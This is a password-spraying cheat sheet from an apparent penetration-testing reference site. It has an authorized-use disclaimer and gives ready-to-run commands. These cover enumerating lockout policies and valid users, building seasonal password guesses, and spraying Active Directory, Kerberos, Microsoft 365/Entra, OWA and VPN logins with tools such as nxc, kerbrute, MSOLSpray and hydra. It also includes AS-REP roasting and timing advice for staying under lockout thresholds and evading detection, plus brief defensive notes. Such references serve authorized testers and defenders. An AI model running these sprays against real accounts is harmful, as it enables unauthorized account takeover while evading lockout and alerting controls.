← All cheat sheets

PASSWORD-SPRAYING

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Low-and-slow authentication attacks: spray one password across many
users to avoid lockouts. Authorized engagements only - lockouts and
alerts have real impact.

SPRAY vs BRUTE FORCE#

  Brute force : many passwords -> one account   (locks accounts fast)
  Spraying    : one password  -> many accounts  (evades lockout)

  Golden rule: stay UNDER the lockout threshold. Learn the policy first.

KNOW THE LOCKOUT POLICY#

  On-prem AD (with creds or null session):
    nxc smb TARGET -u '' -p '' --pass-pol
    enum4linux -P TARGET
    Get-ADDefaultDomainPasswordPolicy       # PowerView / RSAT

  Plan: attempts-per-window < threshold, then wait out the reset window
  (e.g. 1 try / 30-60 min per account).

BUILD THE USER LIST#

    # From OSINT (name format firstname.lastname etc.)
    theHarvester -d target.com -b all
    linkedin2username -> usernames
    # Enumerate valid users where possible:
    kerbrute userenum -d target.com --dc DC users.txt
    nxc smb DC -u users.txt -p '' --continue-on-success   # AS-REP / null
    # o365 / Entra enumeration
    o365spray --enum -d target.com

SEASONAL / POLICY-AWARE PASSWORD CANDIDATES#

    <Season><Year>!      Autumn2025!  Winter2026!
    <Company><Year>!     Target2025!
    <Month><Year>         October2025
    Password1  Welcome1  Changeme123!  <City>123!

  Match candidates to the observed complexity policy (length, classes).

ACTIVE DIRECTORY / SMB#

    nxc smb DC -u users.txt -p 'Autumn2025!' --continue-on-success
    kerbrute passwordspray -d target.com users.txt 'Autumn2025!' --dc DC
    # LDAP (no failed-logon on some paths)
    nxc ldap DC -u users.txt -p 'Autumn2025!'

KERBEROS (quieter than NTLM)#

    kerbrute passwordspray -d target.com users.txt 'Winter2026!'
    # AS-REP roast users without preauth (no password guessing at all)
    GetNPUsers.py target.com/ -usersfile users.txt -no-pass -dc-ip DC

CLOUD: MICROSOFT 365 / ENTRA ID#

    MSOLSpray --userlist users.txt --password 'Autumn2025!'
    o365spray --spray -d target.com -U users.txt -p 'Autumn2025!'
    # Watch for Smart Lockout, Conditional Access, MFA, and legacy-auth
    # endpoints (Autodiscover/EWS/IMAP) that may bypass some controls.

OWA / EXCHANGE / VPN / WEB#

    # Time login responses; valid users may respond differently.
    # Tools: SprayingToolkit, atomizer, ffuf/hydra with 1 pw + throttle.
    hydra -L users.txt -p 'Autumn2025!' TARGET https-post-form "..."

OPSEC & SAFETY#

  - Track attempts per account; never cross the lockout line.
  - Randomize/slow timing; spread across the reset window.
  - Log everything for the report; coordinate with the blue team / POC.
  - One valid credential is the goal - stop and pivot, don't keep spraying.

DEFENSE NOTES (blue side)#

  - MFA everywhere; disable legacy/basic auth.
  - Smart lockout, banned-password lists, anomaly detection.
  - Alert on many failed logons for one password across accounts (4625).

  See also: KERBRUTE, HYDRA, NETEXEC, CRACKMAPEXEC, HASHCAT, JOHN.